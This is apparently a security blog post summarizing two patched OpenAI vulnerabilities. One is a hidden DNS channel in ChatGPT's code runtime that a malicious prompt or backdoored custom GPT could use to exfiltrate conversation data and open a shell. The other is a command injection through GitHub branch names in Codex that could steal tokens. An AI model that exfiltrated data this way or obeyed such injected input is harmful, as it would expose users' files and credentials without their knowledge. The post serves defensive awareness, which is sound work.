OpenAI Patch for ChatGPT Data Exfiltration and Codex Token Vulnerability

 

Overview

This report summarizes two security issues involving OpenAI products that were publicly described on March 30, 2026. The first issue concerned a previously unknown flaw in ChatGPT that researchers said could allow sensitive conversation content, including uploaded files and user messages, to be exfiltrated through a covert DNS-based channel originating from the Linux runtime used for code execution and data analysis. The second issue concerned a command injection vulnerability in OpenAI Codex that researchers said could expose GitHub tokens and enable unauthorized access to code repositories. According to the reporting, OpenAI patched the ChatGPT issue on February 20, 2026, and patched the Codex issue on February 5, 2026. The article also states there was no evidence the ChatGPT flaw had been maliciously exploited.

Objective

The objective of this report is to document the nature of the vulnerabilities, describe their potential impact on users and organizations, and highlight the operational and security implications of relying on AI platforms that execute code or interact with external development environments. The findings are especially relevant for organizations using AI tools for data analysis, coding assistance, or custom GPT workflows.

Summary of Findings

The first finding involved ChatGPT’s execution environment. Researchers from Check Point said the issue bypassed visible guardrails by abusing a hidden DNS-based communication path in the Linux runtime. In practice, this meant a malicious prompt or a backdoored custom GPT could potentially encode and exfiltrate sensitive user content without triggering normal warnings about outbound data transfer. The same pathway could reportedly also be used to establish remote shell access inside the runtime and achieve command execution.

The second finding involved OpenAI Codex. BeyondTrust researchers reported that the vulnerability stemmed from improper sanitization of GitHub branch names during task creation and execution. They said an attacker could inject commands through the branch name parameter, run malicious payloads inside the Codex container, and steal GitHub user access tokens. According to the report, the issue affected the ChatGPT website, Codex CLI, Codex SDK, and the Codex IDE Extension.

Risk Analysis

The ChatGPT issue is significant because it challenges the assumption that the AI runtime is isolated and unable to send data outward in ways the model recognizes. If that assumption is wrong, the user may not receive warnings or approval prompts before data leaves the environment. This creates a serious visibility gap for organizations that allow staff to upload internal documents, customer data, or proprietary material into AI tools.

The Codex issue is significant because AI coding agents often operate with powerful permissions across repositories and development workflows. If a malicious input can trigger command injection and token theft, the impact can extend beyond a single session into lateral movement, repository compromise, and broader software supply chain risk.

Conclusion

These issues show that AI platforms should be treated as high-value computing environments rather than simple chat interfaces. When AI systems can execute code, process files, or connect to developer tooling, their attack surface expands substantially. Even where vendor patches are applied quickly, the underlying lesson is that organizations should not assume native controls alone are enough.

Comments

Popular posts from this blog

The Hidden Lag Killing Your SIEM Efficiency

Critical Vulnerability in Veeam Backup & Replication Exposes Enterprises to Remote Code Execution

Lotus Panda Hacks SE Asian Governments With Browser Stealers and Sideloaded Malware